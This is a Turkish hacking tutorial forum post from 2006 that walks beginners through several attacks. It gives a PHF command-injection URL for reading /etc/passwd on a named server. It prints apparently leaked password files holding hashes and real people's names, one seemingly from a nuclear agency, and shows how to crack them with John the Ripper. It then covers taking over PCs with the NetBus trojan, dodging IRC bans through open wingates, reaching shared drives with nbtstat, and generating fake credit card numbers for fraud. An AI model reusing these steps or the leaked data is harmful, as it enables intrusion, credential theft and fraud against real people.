- 17 Ara 2006
- 132
- 0
WEB hacking Buyrun By End and By Yutah
bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin
kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu
hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat
bir cok eski server da hala uygulanmakta ve netice alinabilmektedir
ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek
gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">http:// www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/ bin/cat%20/etc/passwd
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">cat%20/etc/ passwd
Satirini
browserinize yazip enter e basin bu satir passwd dosyasini acmaya
calisacaktir(adresi attim)
Error
404
/cgi-bin/phf
is not found on this server
Bu satirlar
karsiniza cikarsa bilinki server yeni ve size gecit
vermiyor
Ama asagidaki
listeyi verirse bilinki buldunuz ))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/
passwd
root:2fkbNba29uWys:0Operator:/:/
bin/csh
www-admin:rYsKMjnvRppro:100WWW
administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012 lyutah
CAFER:/home/user/asprilla:/usr/
local/bin/tcsh
hasan:dvUMqNmeeENFs:1016lois
figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006: 10:mehmet
CAFER:/home/user/cafer:/bin/csh
güloglu:kFph8HEM/aaAA:1007Kemal
GULOGLU:/home/user/güloglu:/bin/csh
PHF teknigini
arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz ))
tabi yukardaki satirlari en iyi ihtimali goz onune alinarak
yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki
gibi:
root:*:0Operator:/:/bin/csh
www-admin:*:100WWW
administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012CAFER:
/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016lois
figo:/home/user/hasan:/bin/csh
necmettin:*:1006mehmet
CAFER:/home/user/cafer:/bin/csh
güloglu:*:1007kemal
GULOGLU:/home/user/güloglu:/bin/csh
Bu tek *
sifreleri kirdigini iddia eden bazi programlar var ama ben sadece
guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i
cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu
unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az
kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell
in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son
baglanilan tarihi size verir az kullanilan accountlari
kullanin
SERVERLARI SASIRTMAK
Simdi size bir serveri nasil cildirtirsiniz onu anlaticam
Olaya gavurlar PORT SURF diyolar ...nedir yaw bu port surf??
Annatiim imdi internete bagli her tip makinanin iletisim (data transferi)
yapabilmesi icin cesitli portlar kullandigini biliyorsunuz(en azindan
ogrendiniz)bu portlar internete aciladn gediklerdir aslinda.
Baazi portlar ve islevleri:
PORT23 log icin kullanilir
PORT25 e-mail yollamak icin
PORT80 web sayfalari icin
Tamam bu kadar bilgi yeter sanirim cunku saymakla bitmez nesse nediyoduk
hah port surf iste size nasil yapilir onu anlatacam.
BÖLÜM 1 FIREWALL tespiti
DOS u acin ve
C:WINDOWS>tracert 152.163.199.42 (bu ip serverin ip si olmali ben
salladim)
Tracing route to dns-01.aol.com [152.163.199.42]over a maximum of 30
hops:
1 * * * Request timed out.
2 150 ms 144 ms 138 ms 204.134.78.201
3 375 ms 299 ms 196 ms essek-cyberport.nm.westnet.net [204.134.78.33]
4 271 ms * 201 ms raks365.nm.org [129.121.1.3]
5 229 ms 216 ms 213 ms h4-0.cnss116.Turknet.t3.ans.net[192.103.74.45]
6 223 ms 236 ms 229 ms f2.t112-0.Gediz.t3.ans.net[140.222.112.221]
7 248 ms 269 ms 257 ms h14.t64-0.Izmir.t3.ans.net [140.223.65.9]
8 178 ms 212 ms 196 ms h14.t80-1.raks.net [140.223.65.14]
9 316 ms * 298 ms h12.t60-0.raks.net [140.223.61.9]
10 315 ms 333 ms 331 ms 207.25.134.18
11 * * * Request timed out.
12 * * * Request timed out.
13 207.25.134.189 reports: Destination net unreachable.
Gibi bi tablo karsimza cikicak .Tablo serverlar zincirini bize gosteriyo
bakin 13.Server varya iste o serveri tanimlayamadi nedeni muhtemelen
firewall
Bu demektirki ayni firmanin(orn superonline)bir baska serverini
deniicez.Yalniz dikkat edilmesi gereken husus sinyal yolculugumuzun hangi
serverda bittigi hep ayni server da bitiyosa bu demektirki bu server ana
server dir
Ikinci servere da tracert alalim
C:WINDOWS>tracert 198.83.210.28
Tracing route to dns-aol.ans.net [198.83.210.28]over a maximum of 30
hops:
1 * * * Request timed out.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms turk.net [204.134.78.33]
4 166 ms 228 ms 189 ms raks365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.gediz.t3.ans.net [192.103.74.45]
6 284 ms 296 ms 178 ms f2.t112-0.Izmir.t3.ans.net [140.222.112.221]
7 298 ms 279 ms 277 ms h14.t64-0.Istanbul.t3.ans.net [140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.raks.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-raks.net [198.83.210.28]
Trace complete.
Hehehe bakin bunda firewall falan yok hohohoyt temiz ve bakire(Isilay
Saygin gibi) simdiiii sira geldi PORTSURF a....
Simdi telnetlerinizi acacaksiniz ve preferences te local echo kismini
tikleyin baglanti olarak (yukardaki ornege gore 198.83.210.2
yazin(echo
tiklanmazsa win95 telnet ekraninda bisii goremezsiniz)
Connect remote sysstemde telnet yazan menude daytime yi secin ve connect
olun size tarih saat ve zamani bildiren bir msg gelicek tabbiki serverin
bash history sine kaydiniz gecicek sysadmin oha noluyo lam onune gelen
bizim servere girmis diicek
Hahahaha adami cildirttiniz be ...
Daha ileri ve tehlikeli safhalarda port surf yapmak mumkun anlatirmiyim
bilemiyorum cunku bu isler basinizi agritbilir benden soolemesi
vallaaaa(anlatacam) ))
Password Kýrma
Herhangi bir ftp veya
..... gibi yerlere girilirken kullanýlan þifreler passwd
dosyasýna alegoritmatik bir þekilde
kayýtlýdýr.Bu passwd dosyalarý ftp'nin veya
....'nýn içinde bulunurlar.Ýþte bu da çok büyük bir
güvenlik boþluðu meydana getirdiðinden dünyadaki çoðu
hackerlar,crackerlar..... bu güvenlik boþluðundan yararlanarak
kolay bir þekilde istediklerine ulaþabilirler.
Passwd
mantýðý nedir?
Herhangi bir passwd
dosyasýnýn içeriðine (edit,view)
baktýðýmýzda aþaðýdaki gibi bir
metin görürüz:
root:U5SNZk2JeFyqc:0:0: root:/root:/bin/bash
bin:*1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4lp:/var/spool/lpd:
sync:*:5:0 ync:/sbin:/bin/sync
shutdown:*:6:0 hutdown:/sbin:/sbin/shutdown
halt:*0:halt:/sbin:/sbin/halt
mail:*12:mail:/var/spool/mail:
news:*13:news:/usr/lib/news:
uucp:*14:uucp:/var/spool/uucppublic:
operator:*0perator:/root:/bin/bash
man:*:13man:/usr/man:
postmaster::14:12 ostmaster:/var/spool/mail:/bin/bash
cans:/uyl4V8zixlaE:501:220 evket Can:/home/nyt/cans:/bin/bash
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
adem:F.3SJTjMEDcpU:503:240:Adem Erdogan:/home/num/adem:/bin/bash
gurelil RABgVdC.Z2JA:504:220:Lutfiye Gureli:/home/nyt/gurelil:/bin/bash
acarkans:uddbZ9Mx98iKY:505:220 uheyla
Acarkan:/home/nyt/acarkans:/bin/bash
bekdemir nP07pY6gxPvQ:506:220:Nigar
Bekdemir:/home/nyt/bekdemir:/bin/bash
ayberst:HbDYSOFSXo83k:507:220:Timucin Aybers:/home/nyt/ayberst:/bin/bash
kopuzb:JdYc5r.nfGaEY:508:220:Bayram Kopuz:/home/nyt/kopuzb:/bin/bash
aksita:Agisok05JXRrI:509:220:Ahmet A. Aksit:/home/nyt/aksita:/bin/bash
cimcimk:Ai8r6m1xPcmMw:510:220:Kasif Cimcim:/home/nyt/cimcimk:/bin/bash
tanzer:FnlWFqrYfvVeo:511:240:Tanzer Turker:/home/num/tanzer:/bin/bash
erkoly:Nc.Hq472OXz8k:513:230:Yilmaz Erkol:/home/kim/erkoly:/bin/bash
nyt:A04MMiSSbfAB2:514:220:NYT Bolumu Resmi:/home/nyt/nyt:/bin/bash
borakf:GagTSqeRGJV.c:516:200:Fahir Borak:/home/cnaem/borakf:/bin/bash
uzmenr:0mZJYiyceKJeo:517:200:Resat Uzmen:/home/cnaem/uzmenr:/bin/bash
yaylia:Jm9S5MLXd/R2M:521:220:Ahmet YAYLI:/home/nyt/yaylia:/bin/bash
ozaly:FfGyZIHjOqcoU:522:200:Yasar OZAL:/home/cnaem/ozaly:/bin/bash
yasars:KizDcrryIQhzc:523:270 edat YASAR:/home/saf/yasars:/bin/bash
koksalg:GlDNRAsIGNjWQ:524:290:Guler KOKSAL:/home/rbi/koksalg:/bin/bash
taylans:JnwMm9uPt76Rs:525:210 inan TAYLAN:/home/rea/taylans:/bin/bash
anach:WDkDAsL9FHR/U:526:210:Hakan ANAC:/home/rea/anach:/bin/bash
akgunf:MiNaiGGyR1JG6:527:280:Fadil Akgun:/home/end/akgunf:/bin/bash
subasim:AndMbHdgb5H9.:529:300:Metin Subasi:/home/fiz/subasim:/bin/bash
sungura:JoSjnOjcZqCtM:530:250:Ayse Sungur:/home/rif/sungura:/bin/bash
albayrak:IQJwi/qu0jTo2:531:220 erhan
Albayrak:/home/nyt/albayrak:/bin/bash
onera:Jbhdc51wn/WPw:532:201:Aysegul Oner:/home/cnaem/onera:/bin/bash
bayramy:AlZcxvhIRl6Xw:534:220:Yusuf Bayram:/home/nyt/bayramy:/bin/bash
koksalm:InYyYaGxOichA:535:270:Muhsin Koksal:/home/saf/koksalm:/bin/bash
vakif:cc:536:400:TAEK VAKFI:/home/taek/vakif:/bin/bash
seddighe:OgvuVQiGD/OGw:537:280:Emine Seddigh:/home/end/seddighe:/bin/bash
esenn GHW2392T48kw:538:280:Nur Esen:/home/end/esenn:/bin/bash
yildizi:FfCwQga4b/LvY:539:220:Izzettin YILDIZ:/home/nyt/yildizi:/bin/bash
basolt:MoXAnj2yuDVCg:540:310:Toygun Basol:/home/nel/basolt:/bin/bash
bodurn alDk8NzbfdoU:541:250:Nazan Bodur:/home/rif/bodurn:/bin/bash
bostanm:RSXR9GDBlOBTE:542:300:Melih Bostan:/home/fiz/bostanm:/bin/bash
celebin:8QfdEi0/2EZv2:543:270:Nilgun Celebi:/home/saf/celebin:/bin/bash
dincerb:Ei11tpbbK9ops:544:230:Betul Dincer:/home/kim/dincerb:/bin/bash
gultekin:J6faQXLhHvNEw:545:300:Ergun
Gultekin:/home/fiz/gultekin:/bin/bash
gungore:JkYdRn2X6ivv2:546:270:Emin Gungor:/home/saf/gungore:/bin/bash
sahinh:mNnEblEi8oVz.:547:201:Hasan Sahin:/home/cnaem/sahinh:/bin/bash
ozturkn:Bd8dnZQjzddrk:548:230:Neset Ozturk:/home/kim/ozturkn:/bin/bash
reyhanca:KGcikUdVikuvs:549:300:Atilla
Reyhancan:/home/fiz/reyhanca:/bin/bash
ngd:nn:550:400:Nukleer Guvenlik Dairesi:/home/taek/ngd:/bin/bash
anaem:ccc:551:400:ANAEM:/home/taek/anaem:/bin/ bash
erduran:NgEavV94BD9VY:552:300:Nizamettin
Erduran:/home/fiz/erduran:/bin/bash
nhtg xx:553:400:NHTG:/home/taek/nhtg:/bin/bash
rgd:zzz:554:400:RGD:/home/taek/rgd:/bin/bash
cnaem:ccc:555:200:CNAEM:/home/cnaem/cnaem:/bin/ bash
apakv:CpYe0oeGMCOdI:556:230:Vildan Apak:/home/kim/apakv:/bin/bash
bayulken:OcxNbtUuOttak:512:230 eval
Bayulken:/home/kim/bayulken:/bin/bash
ardagiln:BcclwAyDgYkYs:515:230:Nesrin
Ardagil:/home/kim/ardagiln:/bin/bash
karakell gPmJbKoo/0TU:518:230:Bektas
Karakelle:/home/kim/karakell:/bin/bash
unala:HkbDXjJ3vJpV6:519:230:Unal Azakliogullari:/home/kim/unala:/bin/bash
yilmazy pR/oJRp7PERQ:520:230:Yusuf Z. Yilmaz:/home/kim/yilmazy:/bin/bash
tekd:bbb:528:400:TAEK Teknoloji Dairesi:/home/taek/tekd:/bin/bash
necati:GkXn/ae.y8bKs:533:310:Necati
Kucukarslan:/home/nel/necati:/bin/bash
www:987:557:500:www Users:/users/www:/bin/bash
akyols aF5UBFvEr7Bw:558:210 evgi AKYOL:/home/rea/akyols:/bin/bash
ozcinarbd48qQhIJs0kA:560:270:Berna OZCINAR:/home/saf/ozcinarb:/bin/bash
sevdikb:OecxtOT03rKMA:561:210:Bulent Sevdik:/home/rea/sevdikb:/bin/bash
incem:IiYBQEI0ZpcOY:562:300:Mehmet Zeki Ince:/home/fiz/incem:/bin/bash
kahraman:FS2OPYtiw49L6:563:270:Alper
Kahraman:/home/saf/kahraman:/bin/bash
varinlia:GfmjacT6ct6Fw:564:290:Ahmet
Varinlioglu:/home/rbi/varinlia:/bin/bash
altunh:5csmkn3uoCpyg:565:270:Hasret ALTUNKAYA:/home/saf/altunh:/bin/bash
yilmazf:IE.EN2vUu41HU:566:270:Fatma YILMAZ:/home/saf/yilmazf:/bin/bash
kutd:Fc7lvTDNhJYYQ:567:280 eniz KUT:/home/end/kutd:/bin/bash
tacacs anHMVraPXPA.:1500:400::/home/tacacs:/bin/bash
admin R0HTvLEIhtSM:1499:0:Administrator:/home/admin:/ bin/bash
arpadt:OivHOGPoX1IAU:570:270:Tulin ARPAD:/home/saf/arpadt:/bin/bash
vurale:HjNyW9EI.woao:569:210:Ertac VURAL:/home/rea/vurale:/bin/bash
isyara:OlYWR.EcdVdKU:571:210:Arif ISYAR:/home/rea/isyara:/bin/bash
uzonuro:AaABahtiOEo6A:572:210:Onur UZONUR:/home/rea/uzonuro:/bin/bash
yilmazer:NdQM4Rux/7iT2:210:210:Ayhan
YILMAZER:/home/rea/yilmazer:/bin/bash
bahcecig:AhfABAP0XgS0k:573:210:Gulfem
BAHCECI:/home/rea/bahcecig:/bin/bash
koth:AjVcf4ywDlr3w:574:210:Halil KOT:/home/rea/koth:/bin/bash
elberk:IlBiB9Glgycn.:575:210:Kamil ELBER:/home/rea/elberk:/bin/bash
yasard:VvVMMfuQ4cMRM:576:270 ogan YASAR:/home/saf/yasard:/bin/bash
nyts97:7U3sUENdky6JU:577:220:NUKLEER YAKIT
SEMPOZYUMU:/home/nyt/nyts97:/bin/bash
yoneticiLSMMkABUJ7ic:0:0:Bilgisayar Yoneticisi:/root:/bin/bash
gungorn:dnwkv/5qByrG.:568:290:Nurdan GUNGOR:/home/rbi/gungorn:/bin/bash
bingolda:76l9JUAaRzDoo:578:280:Murat
BINGOLDAG:/home/end/bingolda:/bin/bash
can:LfbBn4bgycs7o:559:100 evket Can:/home/can:/bin/bash
saricams NNbo8vGVmu3Y:579:280 erdar
SARICAM:/home/end/saricams:/bin/bash
bassaria:AfgztlGy2RQJs:580:280:Asiye BASSARI:/home/end/bassaria:/bin/bash
webadmin:Hc5/aIVU/XuuE:581:500:WEB ADMINISTER:/home/webadmin:/bin/bash
ekincis:CjiBia7MbWbs.:582:280 inasi EKINCI:/home/end/ekincis:/bin/bash
aksum:EjFB5hSVLq7Nk:583:280:Mehmet AKSU:/home/end/aksum:/bin/bash
akyuzt:ChgnRmxYcdEuc:584:280:Tanil AKYUZ:/home/end/akyuzt:/bin/bash
karahang:GgJGJA8ospSqU:585:270:Gursel
KARAHAN:/home/saf/karahang:/bin/bash
topcuo:NibHkZNNL/IH6:587:290 ayhan TOPCUOGLU:/home/rbi/topcuo:/bin/bash
kurtcebe:Jk/kUfYoDiUP6:588:280:Tekin
KURTCEBE:/home/end/kurtcebe:/bin/bash
ozturkh:AeyVxXMofhxoU:589:310:Hamza OZTURK:/home/nel/ozturkh:/bin/bash
dogruozm:CjKo7YL/IvXZo:590:280:Mustafa
DOGRUOZ:/home/end/dogruozm:/bin/bash
karainci m3sh7Ih56T7Y:591:280:Nihat
KARAINCI:/home/end/karainci:/bin/bash
info:Bjt9LmUnKpWr6:592:100:CNAEM Information:/home/cnaem/info:/bin/bash
cezzar:Eg/sn2Q/pXsCg:593:290:Rezzan
KUCUKCEZZAR:/home/rbi/cezzar:/bin/bash
tasdelen:A2afZOosjl7xk:594:270:Muslum
TASDELEM:/home/saf/tasdelen:/bin/bash
kocakm:eV51wNMJ9CpM2:595:270:Mehmet KOCAK:/home/saf/kocakm:/bin/bash
-----------------
Yukarýdaki metinden alýnmýþ
rasgele bir satýrýn açýklamasý :
Örnek satýr :
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Kullanýcý
adý(user) : canf
Kodlanmýþ Password : DnNSukj82XXEA
Kullanýcý numarasý : 502:220
Kullanýcý ismi : Ferhan CAN
Dizin : /home/nyt/canf
Türü : /bin/bash
Yukarýda
anlaþýldýðý gibi herþey apaçýk
ortada fakat bir sorun var.O da kodlanmýþ password.Bu kodu
nasýl çözüp de þifreyi alacaksýnýz.Cracker Jack
veya John The Ripper gibi cracker programlarýyla
yapacaksýnýz. Benim tavsiyem John The Ripper
kullanmanýz.Çünkü kullanýmý basittir ))
Not: Bu arada shadowed
denilen bir olay daha vardýr.Bu da aþaðýdaki
gibidir :
Örnek satýr 1 :
canf::502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Örnek satýr 2 :
canf:*:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Kullanýcý adý(user)
KodlanmýþPassword
Kullanýcý no
Kullanýcý ismi Dizin
Türü
canf
; ;
502:220
Ferhan CAN /home/nyt/canf
/bin/bash
canf
;
*
502:220
Ferhan CAN /home/nyt/canf
/bin/bash
Gördüðünüz gibi
kodlanmýþ password bölümü ya boþ
býrakýlarak ya da * ve x iþareti kullanýlarak
gölgelenmiþtir yani shadowed edilmiþtir.Bu tür þifreleri
kýramazsýnýz.
Passwd
dosyalarýný kýrma Tavsiyem John The Ripper olduðu
için bu programýn kullanýmýný
anlatacaðým.
1) Wordlist metodu ile
kýrma
Bu metodla
kýrarken kullandýðýnýz wordlistin içinde
bulunan kelimeler denenir.
Kullanýmý
: john -w:
Örnek : john
passwd.txt -w:words.lst
2)Brute force attack
metodu ile kýrma
Bu metod çok uzun
sürecektir.Çünkü John belirttiðiniz minimum-maximum arasý bütün
kombinasyonlarý deneyecektir. Önce John amcanýn
kýrarken kullandýðý birkaç yöntemi bilelim :
ALL :
Hepsi -
ALPHA : Sadece harfler
-
DIGITS : Sadece
rakamlar
Not: Türkiye'de
süperonline dýþýndaki bütün isslerde min=4 max=8 hane
olduðundan kýracaðýnýz þifre
süperonline deðilse aþaðýda belirttiðim gibi
yapýn.
Öncelikle John The
Ripper'ýn bulunduðu kalsörün içindeki john.ini
dosyasýný açýn ve bu dosyanýn editine girin.
Ve yukarýda belirttiðim gibi kýrarken kullanmak
istediðiniz yöntemi seçin.Ben þimdi ALL seçtiðinizi
varsayýyorum.John.ini dosyasýnýn editinden ALL
bölümünü bulun.Hemen altýnda MinLen = 1 ve MaxLen = 8 gibi
yazýlar göreceksiniz.Tavsiyem MinLen'i 4 yapmanýz.Adamlar
enayimi 1 haneli þifre koycak ))Gerekli deðiþikliði
yaptýktan sonra kaydedip çýkýn ve ms-dos
satýrýna geçin.Ve daha sonra :
Kullanýmý
: john
kýracaðýnýzdosya -i:kýrmayöntemi
Örnek :
john passwd.txt -i:ALL
3)Single metodu
Bu metodla
kullanýcý adý ve kullanýcý bilgileri
sýrayla kýrýlýr.. Doðum
tarihlerini,isim-soyadlarýnýn çeþitli
kombinasyonlarýný þifre olarak kullananlarý
kýrmak için bu metod þiddetle tavsiye edilir.
Ör =>
Cobratti Sanane : Cobras,Scobra...gibi
Kullanýmý
: john -single
Örnek :
john -single passwd.txt
DÝKKAT!!! : Bütün bu yöntemlerde kýrýlan
þifrelerin diziliþ formatý þöyledir :
password (username) => þifre
(kullanýcý adý
Netbus
Pc sistemlerine girmemizi
saglayan bir program. Backorrifice ve master paradiese kadar çok islevi
olmasa bile basitligi ile oldukça basarili. Programin server dosyasinin
karsi pc de açildikdan sonra pc ye girebilirsiniz. Ama netbus artik çok
duyuldu ve server dosyasi (patch.exe) yi artil herkes icon undan yada
boyutundan taniyor bu yuzden isiniz oldukça zor ilerde netbus un server
dosyasini diger dosyalara bulastirmayi da anlatacagim.
Simdi indirmis oldugunuz netbus paketindeki dosyalari taniyalim
Netbus.exe : Bizim pc ye saldirmak için kullanacagimiz yazilim.
Patch.exe : Karsi pc ye yollanmasi gereken server programi
Host : Listemize kaydetmis oldugumuz, eklemis oldugumuz ip numaralari bu
dosyanin içine yazilir. Ilk aldigiunizda bu dosya olmayacakdir sonradan
olusur.
Temp.jpg: Karsi pc nin o anki goruntusunu screendump yaparak cekmis
oldugumuz resimler ilk olarak boyle kaydedilir. Eger bi sefer yaptikdan
sonra dosyanin yedegini almazsaniz bi sornaki goruntude onun uzerine
yazilir.
Netbusdaki komutlar ve gorevleri
Open Cdrom: Cdrom u açar,kapatir
Show image: Resim dosyalarini gösterir
Swap Mouse: Mouse cursor unu gostermez-geri açar
Start Program: Karsi pcdeki bi programi çalistitir.
Msg Manager: Mesaj Yollarsiniz. (hata mesajlari)
Screendump: O anki karsi pc nin ekran goruntusunu jpg olarak pcnize atar.
Get Info: Patch in nerde oldugu ve karsi pc de kaç kisinin daha oldugunu
gösterir.
Port Redirect: Port u degistirir.
Play Sound: Ses dosyasi çalistirir.
Exit Windows: Windows'u kapatir-Reset attirir-Askiya alir.
Send Text: Mesaj yollamanizi saglar
Active Winds: O anki aktif programlari gosterir.
Mouse pos: Mouse elegecirir..
Listen: Karsidakinin ne yazdigini gösterir
Sound System: Karsi pcnin ses ayarlari ile hasir nesir olabilmek için.
Server Setup: Ayar olayi.
Control Mouse: Mousu ele geçirir.
Go to Url: Sizin istediginiz urlye yollar karsidakini
Key Manager: Klavyeyi kitler-açar
File Manager: Dosya yollamak,almak için
IRC
'DE NASIL BANLANMAZSINIZ IP SPOOOF
Wingate ile IP spoofing
yapin BAN ve K-Line'lardan ve Tabiki Oplardan Korkmayin!!!!
Wingate internet cafelerde, sirketlerde ve bunun gibi bircok bilgisayari
birbirine baglayan yerlerde kullanilan
bir protokoldur. Tabii bizim ilgilendigimiz bolumse wingate'in 23. portu.
Bu 23. portu kullanarak
IRC de Op lar tarafindan BAN'lansek, K-Line koysalar ve hatta Domain
yapsalar bile istedigimiz
kanala rahatca girebiliriz. Wingate' in bir diger ozelligi ise NUKE yeme,
ekranin kararmasina, hattan
dusmeye son veriyo kesinlikle wingate yaptiktan sonra NUKE yemek yok!!!
WinGate>
Ilk yapmamaiz gereken sey once 23. port'u bulan yani bos wingate serverini
bulan WingateScan
programini cekmek. Bu kullanilmasi oldukca basit bir program irc'de
gordugunuz ip'leri buraya yaziyosunuz ve o kendiliginden wingate servery
buluyor
Mesela: Mirc ekraninda Phiber_Optik join zurna from 212.55.66.98' diye
kimin nerden baglandigini
gosteren yazilar gecer hemen burdaki ip numarasini 212.55.66.98 'i
wingateScan progrminda
IP yazan bolume giriyoruz WingateScan programi 212.55.68.00'dan
212.55.66.255' e
kadar olan bolumde wingate serverini arar ve diyelimki 212.55.68.155'te
wingate
buldu assagidaki server found bolumunde hemen cikar!
Mirc'i aciyoruz karsimiza cikan beyaz sayfada
/server 212.55.68.155:23
yaziyoruz ve karsimiza Wingate diye bi yazi cikacak daha sonra yine
bitakim yazilar cikacak
/quote user xxxxx xxxxx [/U][/URL] Netbus-Detector mirc
addonu
Yukarýda
belirtilenleri temin ettikten sonra ava çýkabiliriz.
Yukarýda belirtilen Netbus-Detector mirc addonunu Chat
programýnýzýn bulunduðu klasöre açýn :
c:mirc (mesela). Daha sonra chat programýnýzý
çalýþtýrýn. Ve status bölümünde
þunlarý yazýn :
/load -rs NetBus.mrc
=> yazýn ve enter'a basýn
/load -rs Net-Aliases.mrc
=> yazýn ve enter'a basýn
/load -rs BusScan.mrc
=> yazýn ve enter'a basýn
Bunlarý her
yazýþýnýzdan sonra
Loaded script
'c:mircnetbus.mrc
gibi bir yazýyla
karþýlaþýrsanýz bu iþ oldu
demektir. Chate girin mesela irc.dal.net'teki #zurna kanalý
olabilir (Kanal ne kadar büyük olursa o kadar iyi olur. Tabi ne kadar
fazla büyük kanala girerseniz o kadar iyi). Þimdi beklemeye
baþlayýn. Neyi mi bekliyorsunuz? Kanala giren
kiþilerden netbus sheepi açýk olanlarýn size teslim
olmasýný. Az önce yüklediðimiz mirc addonun
mantýðý kanala join olan kiþilerin 12345'inci
portunu yoklayýp Netbus açýðý var mý
hýzlý bir þekilde araþtýrmak.
Bulduðunda ise o anki nickiniz size özel açacak ve "Þu kanaldaki
þu host/ip'li kiþide netbus sheepi bulunmuþtur." diyerek
size haber verecek. Sizde hemen ip'yi alacaksýnýz ve
netbusdan baðlanacaksýnýz. O da ne karþý
bilgisayar þifre korumalý. Hemen gaban'ý
çalýþtýrýp þifreyi deðiþtirin.
Daha sonra Netbus'dan tekrar baðlanýn ve
karþýnýza gelen þifre sorusuna az önce
belirttiðiniz þifreyi yazarak bilgisayarýna girin. Bu
kadar basit.
Nbtstat Ile Karsi Pc yi Trojansiz Elegecirmek
Dos komut satirinda
nbtstat -A <IP adresi> komutunu veriyoruz. Basarili Olmussak:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
^M0REBID <00> UNIQUE Registered
VIRTUAL COMPUTE<00> GROUP Registered
^M0REBID <03> UNIQUE Registered
MAC Address = 44-45-53-54-00-00
gibi bir cikti almamiz gerekir. Burada ^MOREBID bilgisayarin ismidir.
Bizim icin önemli olan da bu.
c- Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz.
("Edit lmhosts" komutuyla) Eger ki daha önceden lmhosts dosyasi varsa bile
yapacagimiz is: x.x.x.x ^MOREBID satirini eklemek (x.x.x.x IP adresi,
^MOREBID bilgisayarin adi)
d- Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina
eklediklerimizi networkumuze tanitiyoruz.
e- Simdi Windows'a dönme zamani. Baslat/Bul/Bilgisayarlar menusunden
UNIQUE adini vererek (Yukarida ekran ciktisinda ^MOREBID <00> UNIQUE
Registered satirindaki Unique) bilgisayari aratiyoruz. Bu islemler
yaptiktan sonra bilgisayar bulunuyor. Bilgisayar seklinin uzerine cift
tiklayip harddiskini görebiliyoruz.
Not: Bu olay kirmak istediginiz ana bilgisayarin dosya paylasimina acik
olmasi durumunda calisir.
Bedava Domainmi almak istiyonuz?
Þu sýralarda
internette çok popüler olan domain, server... olayýný
anlatacaðým. Eðer internette yoðun olarak
warez,hack,adult tipi sitelere uðramakta iseniz,sizde bu iþi
merak ediyorsunuz demektir. Bu yazýdan sonra eminim ki
merakýnýz büyük ölçüde azalacaktýr. Warez, hack,
adult tipi siteler aþýrý derecede server
ihtiyacý duyarlar. Yani bulunduklarý server ne kadar büyük
olursa o kadar daha fazla program, resim... gibi þeyler koyarak hit
almak amacýndadýrlar. Günümüzde de domain, server... denen
þeylerin fiyatlarý ortadadýr. Þimdi siz
diyeceksiniz : "Domain server gibi þeyler pahalý diyorsun
fakat ortalýk domainden geçilmiyor. Önüne gelen domain, server
falan almýþ bu iþ nasýl oluyor?".
Ýþte bizim esas konumuz da budur. Bu adamlar
serverlarý nasýl alýyorlar? Para mý
veriyorlar? Yoksa baþka bir yol mu var?
1) Yukarýda
anlattýðým olay her domain almýþ kiþi
için geçerli deðildir. Yani kendi parasýyla warez serveri ya da
domain almýþ kiþiler vardýr.
2)
Aþaðýda anlatacaðým olayý denemeniz
halinde baþýnýza gelebileceklerin mesuliyeti tamamen
size aittir.
3) 2.Þýktan
korkup da yazýyý okumaktan vazgeçmeyin. Çünkü
aþaðýda bu olayý en güvenli þekilde
nasýl yapilabildiðini de anlattým. 4) Bedava domain ve
küçük bir server veren yer istiyorsanýz www.webjump.com ya da
www.hypermart.net adresinden alabilirsiniz. Büyük bir server
istiyorsanýz aþaðýdaki yazýyý
okuyunuz.
Eveettt. Artýk
heyecanla beklenen an geldi. Fakat hack olayýndan önce
tedbirlerimizi almalýyýz deðil mi? ) Ýlk olarak
analog bir hattan baðlanmaya çalýþýn. Isp'nizi
arayarak isp'nizin analog hat telefon numarasýný
sorabilirsiniz. Daha sonra browser'ýnýzda proxy
ayarlarýnýzý yapýn. Avrupa'da bulunan bir
proxy'yi kulllanmakta yarar var. Bütün bunlarý yaptýktan
sonra bir sahte kredi kartý accsi bulmaya geldi sýra.
Elinize babanýzýn veya annenizin kredi kartýný
alýn. Sahte kredi kartý programýnýzý
çalýþtýrýn. Bu programlarý nette
heryerde bulabilirsiniz. Eðer hiç görmedim diyorsanýz,
yazýnýn burdan sonrasýný
okumayýnýz. Sahte Kredi Kartý programýndan
extrapolate tuþuna basýn ve önünüze gelen boþ
kutucuða sahip olduðunuz kredi kartýnýzýn
numarasýný yazýn. Daha sonra önünüze gelen
rakamlardan rastgele not edin. Bu arada kendi esas kredi
kartýnýzýn son kullanma tarihini de not edin. Buraya
kadar baþarýyla geldiyseniz iþlemin birinci bölümü
bitmiþ demektir. Hadi geçmiþ olsun.
Internette bir sürü
parayla domain, server... satan yerler vardýr. Ýþte bu
